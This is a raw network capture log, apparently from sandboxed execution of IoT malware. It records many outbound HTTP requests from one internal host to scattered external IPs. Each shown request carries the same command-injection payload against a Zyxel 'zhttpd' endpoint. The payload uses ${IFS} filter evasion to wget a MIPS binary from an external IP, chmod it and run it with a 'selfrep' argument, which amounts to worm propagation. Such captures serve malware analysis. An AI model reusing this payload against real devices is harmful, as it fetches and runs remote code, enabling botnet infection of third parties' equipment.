                                                Jan 28, 2024 10:16:42.060097933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8793192.168.2.235239079.171.72.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060142040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8794192.168.2.2355650167.29.191.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060153008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8795192.168.2.2358502205.139.65.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060198069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8796192.168.2.2333112105.209.56.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060218096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8797192.168.2.2348654111.121.220.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060254097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8798192.168.2.234973039.33.129.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060288906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8799192.168.2.2351916150.230.170.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060303926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8800192.168.2.2352936171.134.14.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060338974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8801192.168.2.2352962112.230.146.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060374022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8802192.168.2.2350080186.73.110.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060395002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8803192.168.2.2344014178.197.148.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060411930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8804192.168.2.2342624106.149.118.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060425043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8805192.168.2.2343618121.185.190.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060444117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8806192.168.2.234874638.93.211.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060452938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8807192.168.2.236099693.222.86.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060498953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8808192.168.2.235059882.175.187.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060535908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8809192.168.2.2350208141.14.254.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060543060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8810192.168.2.2348416124.120.183.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060570002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8811192.168.2.234249452.204.139.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060580969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8812192.168.2.235292260.72.218.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060605049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8813192.168.2.2345514101.24.94.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060627937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8814192.168.2.235446467.29.78.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060651064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8815192.168.2.2357942122.158.226.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060687065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8816192.168.2.2348144178.53.230.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060719967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8817192.168.2.235850480.237.90.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060744047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8818192.168.2.234366620.165.146.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060775042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8819192.168.2.2351092123.19.125.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060791016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8820192.168.2.2353792116.137.48.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060817957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8821192.168.2.2347384116.144.90.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060847998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8822192.168.2.235560291.228.235.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060867071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8823192.168.2.2357586185.93.222.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060884953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8824192.168.2.2349578210.241.58.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060918093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8825192.168.2.233767613.127.213.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060965061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8826192.168.2.2358666163.170.196.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060971975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8827192.168.2.23427741.38.21.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.060986996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8828192.168.2.2350458166.18.190.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061007977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8829192.168.2.234941275.134.156.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061023951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8830192.168.2.2349834181.178.133.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061039925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8831192.168.2.235967213.78.47.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061058998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8832192.168.2.2354988189.36.130.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061095953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8833192.168.2.2335226135.60.177.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061117887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8834192.168.2.2344668125.124.75.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061122894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8835192.168.2.2335528204.52.56.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061145067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8836192.168.2.2359598150.46.250.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061161041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8837192.168.2.2333836204.95.250.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061171055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8838192.168.2.233728052.10.133.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061213970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8839192.168.2.2333856189.217.240.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061235905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8840192.168.2.2352538146.178.89.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061295986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8841192.168.2.234608841.116.72.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061326027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8842192.168.2.2343328170.43.36.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061362028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8843192.168.2.235575273.184.220.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061363935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8844192.168.2.2352578128.237.63.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061402082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8845192.168.2.234543018.239.11.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061439037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8846192.168.2.236072451.39.151.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061465979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8847192.168.2.2347428112.157.135.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061489105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8848192.168.2.23536485.108.115.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061505079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8849192.168.2.2353572151.170.11.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061537981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8850192.168.2.2352734136.171.251.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061578035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8851192.168.2.2359948126.82.75.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061604977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8852192.168.2.2337584116.178.151.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061635017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8853192.168.2.2337822199.163.241.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.061640978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8854192.168.2.2337282110.39.229.221443
                                                TimestampBytes transferredDirectionData
